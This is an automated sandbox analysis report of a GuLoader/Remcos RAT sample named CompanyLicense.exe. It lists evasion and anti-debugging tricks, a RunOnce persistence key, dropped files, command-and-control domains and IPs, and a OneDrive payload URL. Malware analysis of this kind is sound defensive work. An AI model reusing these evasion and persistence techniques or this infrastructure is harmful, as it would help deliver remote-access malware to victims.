Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report CompanyLicense.exe

Overview

General Information

Sample Name:CompanyLicense.exe
Analysis ID:341661
MD5:ace3e9fc3a2277aa4e72881c9f204642
SHA1:50337a4aa52b65cac5fd2745c3fe7d88d503d00f
SHA256:c6cf35735aff0eba459a6a1f4b65722ba08dfb0beed54b0df8e9be3ec3edba98

Most interesting Screenshot:

Detection

Remcos GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Creates autostart registry keys with suspicious values (likely registry only malware)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • CompanyLicense.exe (PID: 5148 cmdline: 'C:\Users\user\Desktop\CompanyLicense.exe' MD5: ACE3E9FC3A2277AA4E72881C9F204642)
    • CompanyLicense.exe (PID: 6572 cmdline: 'C:\Users\user\Desktop\CompanyLicense.exe' MD5: ACE3E9FC3A2277AA4E72881C9F204642)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
    Process Memory Space: CompanyLicense.exe PID: 6572JoeSecurity_RemcosYara detected Remcos RATJoe Security
      Process Memory Space: CompanyLicense.exe PID: 6572JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
        Process Memory Space: CompanyLicense.exe PID: 6572JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
          Process Memory Space: CompanyLicense.exe PID: 5148JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
            Click to see the 1 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: RemcosShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\CompanyLicense.exe, ProcessId: 6572, TargetFilename: C:\Users\user\AppData\Roaming\remcos\logs.dat

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Yara detected Remcos RATShow sources
            Source: Yara matchFile source: Process Memory Space: CompanyLicense.exe PID: 6572, type: MEMORY

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: CompanyLicense.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: global trafficTCP traffic: 192.168.2.4:49731 -> 185.140.53.253:2048
            Source: Joe Sandbox ViewIP Address: 185.140.53.253 185.140.53.253
            Source: unknownDNS traffic detected: queries for: onedrive.live.com
            Source: CompanyLicense.exe, 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=3EA7AF3CF2A8B6E2&resid=3EA7AF3CF2A8B6E2%21118&authkey=AM5VKIx

            E-Banking Fraud:

            barindex
            Yara detected Remcos RATShow sources
            Source: Yara matchFile source: Process Memory Space: CompanyLicense.exe PID: 6572, type: MEMORY

            System Summary:

            barindex
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A08D5 EnumWindows,NtSetInformationThread,0_2_020A08D5
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A8B16 NtProtectVirtualMemory,0_2_020A8B16
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A474B NtSetInformationThread,0_2_020A474B
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A0D52 NtWriteVirtualMemory,TerminateProcess,0_2_020A0D52
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A8E25 NtProtectVirtualMemory,0_2_020A8E25
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A38A7 NtWriteVirtualMemory,0_2_020A38A7
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A34CD NtWriteVirtualMemory,0_2_020A34CD
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A36D0 NtWriteVirtualMemory,0_2_020A36D0
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A0917 NtSetInformationThread,0_2_020A0917
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A35EF NtWriteVirtualMemory,0_2_020A35EF
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A35E2 NtWriteVirtualMemory,0_2_020A35E2
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 1_2_00568B16 NtProtectVirtualMemory,1_2_00568B16
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 1_2_00568EC6 NtSetInformationThread,1_2_00568EC6
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 1_2_00569248 NtSetInformationThread,1_2_00569248
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 1_2_0056910C NtSetInformationThread,1_2_0056910C
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 1_2_00569436 NtSetInformationThread,1_2_00569436
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 1_2_00568FE0 NtSetInformationThread,1_2_00568FE0
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 1_2_005695B9 NtSetInformationThread,1_2_005695B9
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_004041A10_2_004041A1
            Source: CompanyLicense.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Internering2.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: CompanyLicense.exe, 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSKULPTURUDSTILLING.exe vs CompanyLicense.exe
            Source: CompanyLicense.exe, 00000000.00000002.667883059.0000000002090000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs CompanyLicense.exe
            Source: CompanyLicense.exe, 00000001.00000000.666580572.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSKULPTURUDSTILLING.exe vs CompanyLicense.exe
            Source: CompanyLicense.exe, 00000001.00000002.1001890961.000000001DEF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs CompanyLicense.exe
            Source: CompanyLicense.exe, 00000001.00000002.1001872713.000000001DDA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs CompanyLicense.exe
            Source: CompanyLicense.exeBinary or memory string: OriginalFilenameSKULPTURUDSTILLING.exe vs CompanyLicense.exe
            Source: CompanyLicense.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: classification engineClassification label: mal100.troj.evad.winEXE@3/3@74/2
            Source: C:\Users\user\Desktop\CompanyLicense.exeFile created: C:\Users\user\AppData\Roaming\remcosJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeMutant created: \Sessions\1\BaseNamedObjects\idle-C625D6
            Source: C:\Users\user\Desktop\CompanyLicense.exeFile created: C:\Users\user\AppData\Local\Temp\~DF35090EC034E56AF4.TMPJump to behavior
            Source: CompanyLicense.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\CompanyLicense.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeFile read: C:\Users\user\Desktop\CompanyLicense.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\CompanyLicense.exe 'C:\Users\user\Desktop\CompanyLicense.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\CompanyLicense.exe 'C:\Users\user\Desktop\CompanyLicense.exe'
            Source: C:\Users\user\Desktop\CompanyLicense.exeProcess created: C:\Users\user\Desktop\CompanyLicense.exe 'C:\Users\user\Desktop\CompanyLicense.exe' Jump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CompanyLicense.exe PID: 6572, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CompanyLicense.exe PID: 5148, type: MEMORY
            Yara detected VB6 Downloader GenericShow sources
            Source: Yara matchFile source: Process Memory Space: CompanyLicense.exe PID: 6572, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CompanyLicense.exe PID: 5148, type: MEMORY
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_00405695 push edi; ret 0_2_0040569C
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A5757 push edi; ret 0_2_020A575A
            Source: C:\Users\user\Desktop\CompanyLicense.exeFile created: C:\Users\user\AppData\Local\Temp\Arsenation\Internering2.exeJump to dropped file

            Boot Survival:

            barindex
            Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
            Source: C:\Users\user\Desktop\CompanyLicense.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Hamid C:\Users\user\AppData\Local\Temp\Arsenation\Internering2.vbsJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Hamid C:\Users\user\AppData\Local\Temp\Arsenation\Internering2.vbsJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HamidJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HamidJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HamidJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HamidJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A0D52 NtWriteVirtualMemory,TerminateProcess,0_2_020A0D52
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A0BD7 TerminateProcess,0_2_020A0BD7
            Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
            Source: C:\Users\user\Desktop\CompanyLicense.exeRDTSC instruction interceptor: First address: 0000000000562BFB second address: 0000000000562BFB instructions:
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\CompanyLicense.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: CompanyLicense.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\CompanyLicense.exeRDTSC instruction interceptor: First address: 0000000000562BFB second address: 0000000000562BFB instructions:
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A0D52 rdtsc 0_2_020A0D52
            Source: C:\Users\user\Desktop\CompanyLicense.exeWindow / User API: threadDelayed 930Jump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exe TID: 6792Thread sleep count: 930 > 30Jump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exe TID: 6792Thread sleep time: -9300000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\CompanyLicense.exeLast function: Thread delayed
            Source: CompanyLicense.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

            Anti Debugging:

            barindex
            Contains functionality to hide a thread from the debuggerShow sources
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A08D5 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,?,6DDC21B5,6DDB9555,?,321C9581,?,020A83490_2_020A08D5
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\CompanyLicense.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A0D52 rdtsc 0_2_020A0D52
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A457E LdrInitializeThunk,0_2_020A457E
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A2C10 mov eax, dword ptr fs:[00000030h]0_2_020A2C10
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A2259 mov eax, dword ptr fs:[00000030h]0_2_020A2259
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A2C7B mov eax, dword ptr fs:[00000030h]0_2_020A2C7B
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A7679 mov eax, dword ptr fs:[00000030h]0_2_020A7679
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A3CAD mov eax, dword ptr fs:[00000030h]0_2_020A3CAD
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A833C mov eax, dword ptr fs:[00000030h]0_2_020A833C
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 0_2_020A6F42 mov eax, dword ptr fs:[00000030h]0_2_020A6F42
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 1_2_00566F42 mov eax, dword ptr fs:[00000030h]1_2_00566F42
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 1_2_00567679 mov eax, dword ptr fs:[00000030h]1_2_00567679
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 1_2_0056833C mov eax, dword ptr fs:[00000030h]1_2_0056833C
            Source: C:\Users\user\Desktop\CompanyLicense.exeCode function: 1_2_00563CAB mov eax, dword ptr fs:[00000030h]1_2_00563CAB
            Source: C:\Users\user\Desktop\CompanyLicense.exeProcess created: C:\Users\user\Desktop\CompanyLicense.exe 'C:\Users\user\Desktop\CompanyLicense.exe' Jump to behavior
            Source: CompanyLicense.exe, 00000001.00000002.998846227.0000000002527000.00000004.00000040.sdmpBinary or memory string: Program Manager
            Source: CompanyLicense.exe, 00000001.00000002.998765960.0000000000FC0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: CompanyLicense.exe, 00000001.00000002.998765960.0000000000FC0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: logs.dat.1.drBinary or memory string: [ Program Manager ]
            Source: CompanyLicense.exe, 00000001.00000002.998765960.0000000000FC0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: CompanyLicense.exe, 00000001.00000002.998846227.0000000002527000.00000004.00000040.sdmpBinary or memory string: Program Managerrgo.org
            Source: CompanyLicense.exe, 00000001.00000002.998846227.0000000002527000.00000004.00000040.sdmpBinary or memory string: Program Manager9

            Stealing of Sensitive Information:

            barindex
            Yara detected Remcos RATShow sources
            Source: Yara matchFile source: Process Memory Space: CompanyLicense.exe PID: 6572, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected Remcos RATShow sources
            Source: Yara matchFile source: Process Memory Space: CompanyLicense.exe PID: 6572, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management InstrumentationRegistry Run Keys / Startup Folder11Process Injection12Masquerading1OS Credential DumpingSecurity Software Discovery721Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Virtualization/Sandbox Evasion22LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery31VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            sheilabeltagy3m.hopto.org1%VirustotalBrowse

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            sheilabeltagy3m.hopto.org
            		185.140.53.253
            		truefalseunknown
            northside.hopto.org
            		185.140.53.253
            		truefalse
              		unknown
              sqknbg.dm.files.1drv.com
              		unknown
              		unknownfalse
                		high
                onedrive.live.com
                		unknown
                		unknownfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://onedrive.live.com/download?cid=3EA7AF3CF2A8B6E2&resid=3EA7AF3CF2A8B6E2%21118&authkey=AM5VKIxCompanyLicense.exe, 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmpfalse
                    		high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    185.140.53.253
                    		unknownSweden
                    		209623DAVID_CRAIGGGfalse

                    Private

                    IP
                    192.168.2.1

                    General Information

                    Joe Sandbox Version:31.0.0 Red Diamond
                    Analysis ID:341661
                    Start date:19.01.2021
                    Start time:17:13:16
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 12s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:CompanyLicense.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:17
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@3/3@74/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 32.8% (good quality ratio 22.5%)
                    • Quality average: 43.7%
                    • Quality standard deviation: 33%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .exe
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                    • Excluded IPs from analysis (whitelisted): 13.88.21.125, 52.147.198.201, 13.107.42.13, 13.107.42.12, 51.11.168.160, 92.122.213.194, 92.122.213.247, 52.254.96.93, 52.251.11.100, 20.54.26.129, 8.248.117.254, 8.248.131.254, 67.26.73.254, 8.248.137.254, 8.248.147.254, 40.88.32.150
                    • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-dm-files-geo.onedrive.akadns.net, arc.msn.com.nsatc.net, bn2eap.displaycatalog.md.mp.microsoft.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, l-0004.l-msedge.net, skypedataprdcoleus15.cloudapp.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-dm-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, l-0003.l-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, odc-dm-files-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    17:14:22API Interceptor1384x Sleep call for process: CompanyLicense.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    185.140.53.25316Product Specifications list -Order PCT1086586 1st Video.exeGet hashmaliciousBrowse
                      15Order PCT1086586 - Project Commercial Conditions.exeGet hashmaliciousBrowse
                        58Product Specifications list -Order PCT1086586 1st Video.exeGet hashmaliciousBrowse
                          57Order PCT1086586 - Project Commercial Conditions.exeGet hashmaliciousBrowse
                            15Product Specifications list -Order PCT1086586 1st Video.exeGet hashmaliciousBrowse
                              14Order PCT1086586 - Project Commercial Conditions.exeGet hashmaliciousBrowse
                                57Product Specifications list -Order PCT1086586 1st Video.exeGet hashmaliciousBrowse
                                  56Order PCT1086586 - Project Commercial Conditions.exeGet hashmaliciousBrowse

                                    Domains

                                    No context

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    DAVID_CRAIGGGPurchase Order 2094742424.exeGet hashmaliciousBrowse
                                    • 185.244.30.132
                                    PURCHASE OREDER. PRINT. pdf.exeGet hashmaliciousBrowse
                                    • 91.193.75.45
                                    PO.exeGet hashmaliciousBrowse
                                    • 185.140.53.234
                                    SWIFT.exeGet hashmaliciousBrowse
                                    • 185.140.53.154
                                    SecuriteInfo.com.BScope.Trojan-Dropper.Injector.exeGet hashmaliciousBrowse
                                    • 185.140.53.234
                                    PROOF OF PAYMENT.exeGet hashmaliciousBrowse
                                    • 185.140.53.131
                                    Orden n.#U00ba STL21119, pdf.exeGet hashmaliciousBrowse
                                    • 185.140.53.129
                                    Proof of Payment.exeGet hashmaliciousBrowse
                                    • 185.244.30.51
                                    DxCHoDnNLn.exeGet hashmaliciousBrowse
                                    • 185.140.53.202
                                    T7gzTHDZ7g.rtfGet hashmaliciousBrowse
                                    • 185.140.53.202
                                    PO - 2021-000511.exeGet hashmaliciousBrowse
                                    • 185.244.30.69
                                    PO AR483-1590436 _ J-3000 PROJT.xlsxGet hashmaliciousBrowse
                                    • 185.140.53.202
                                    Qotation.exeGet hashmaliciousBrowse
                                    • 185.140.53.154
                                    PO - 2021-000511.exeGet hashmaliciousBrowse
                                    • 185.244.30.69
                                    file.exeGet hashmaliciousBrowse
                                    • 91.193.75.155
                                    Orden n.#U00ba 21115, pdf.exeGet hashmaliciousBrowse
                                    • 185.140.53.129
                                    Lists.exeGet hashmaliciousBrowse
                                    • 185.140.53.136
                                    Quotation Request.exeGet hashmaliciousBrowse
                                    • 185.244.30.171
                                    PO-PDF_PDF.exeGet hashmaliciousBrowse
                                    • 185.244.30.69
                                    Quiero hacer el pedido de su producto.exeGet hashmaliciousBrowse
                                    • 185.244.30.18

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Temp\Arsenation\Internering2.exe
                                    Process:C:\Users\user\Desktop\CompanyLicense.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):98304
                                    Entropy (8bit):5.50764794769054
                                    Encrypted:false
                                    SSDEEP:768:8zNE6BYzwvWXallllllllllllllllllllllllllllllllllllllllllllllllllK:oE66zwuoPMvaB5DqinLdNW2XLnolNI8
                                    MD5:ACE3E9FC3A2277AA4E72881C9F204642
                                    SHA1:50337A4AA52B65CAC5FD2745C3FE7D88D503D00F
                                    SHA-256:C6CF35735AFF0EBA459A6A1F4B65722BA08DFB0BEED54B0DF8E9BE3EC3EDBA98
                                    SHA-512:9220FE497F297AE1D86A13DD28FFFC381A6945AC49CC2F3B904D605A193AF00DAAF18B6BC4F6E85D93F6A80B29D34DD56D7269BBC11B46D98319E571989E721F
                                    Malicious:false
                                    Reputation:low
                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........I...................................Rich............................PE..L......T................. ...`...............0....@.................................%...........................................(....P..p>..................................................................8... ....................................text...p........ .................. ..`.data........0.......0..............@....rsrc...p>...P...@...@..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................
